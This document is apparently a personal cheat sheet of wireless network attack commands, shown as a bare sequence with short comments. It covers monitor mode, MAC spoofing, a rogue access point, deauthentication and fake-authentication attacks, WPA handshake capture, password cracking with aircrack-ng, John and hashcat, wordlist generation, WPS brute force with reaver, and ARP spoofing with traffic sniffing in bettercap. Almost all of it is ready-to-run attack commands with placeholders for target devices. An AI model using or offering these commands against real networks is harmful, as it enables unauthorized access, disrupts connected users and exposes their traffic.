airmon-ng check kill
service NetworkManager start
systemctl restart NetworkManager
systemctl status NetworkManager
airmon-ng start wlan1
airmon-ng stop wlan1
aireplay-ng --test wlan1
you can put any fake MAC Address like this 00:01:02:03:04:05
airbase-ng -a 00:01:02:03:04:05 --essid "<AP_name>" -c {channel_no.} wlan1
ifconfig wlan1 down
ifconfig wlan1 hw ether 00:11:22:33:44:55
ifconfig wlan1 up
airodump-ng wlan1
airodump-ng --band a wlan1
airodump-ng --band abg wlan1
airodump-ng --bssid {router_MAC_add} --channel {channel_no.} --write (file_name_without_extension) wlan1
wireshark
aireplay-ng --fakeauth 0 -a {router_MAC_add} -h {Your_NIC_MAC_add} waln1
aireplay-ng --deauth {no_of_deauth_packets} -a {router_MAC_add} -c {target_MAC_add} wlan1
if it`s fails then, target router on specfic channel
airodump-ng --bssid {router_MAC_add} --channel {channel_no.} wlan1
aireplay-ng --fakeauth {delay} -a {router_MAC_add} -h {your_NIC_MAC} wlan1
airodump-ng --bssid {router_MAc_add} --channel {channel_no.} --write {file_name_without_extn} wlan1
aircrack-ng {.cap} -J {extension_name_not_required}
hccap2john {.hccap} > {.txt}
john {.txt}
aircrack-ng {.cap} -w {Wordlist.txt}
man crunch
crunch 6 8 {key length} abc12 {char used} -o test.txt
crunch {key_length Ex: 6 8} {char_used Ex: abc12} -o {.txt} -t {patter Ex: a@@@@b}
wash --interface wlan1
Warning
Current version of reaver have some bugs, you can use old version
reaver --bssid {router_MAC_add} --channel {channel_no.} --interface wlan1 -vvv --no-associate
sudo bettercap -iface wlx242fd0da04dc
set arp.spoof.fullduplex true
net.show
set arp.spoof.targets <target_ip>
arp.spoof on
for scan target browsed
net.sniff on
sudo airmon-ng check kill
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
sudo ip link set wlan1 down
sudo iw dev wlan1 set type monitor
sudo ip link set wlan1 u
sudo hcxdumptool -i wlan1 -w dumpfile.pcapng
hcxpcapngtool -o hash.hc22000 -E <essid> essidlist dumpfile.pcapng
hashcat -a 0 -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt -D 2
hashcat -m 22000 hash.hc22000 wordlist.txt
sudo systemctl start wpa_supplicant.service
sudo systemctl start NetworkManager.service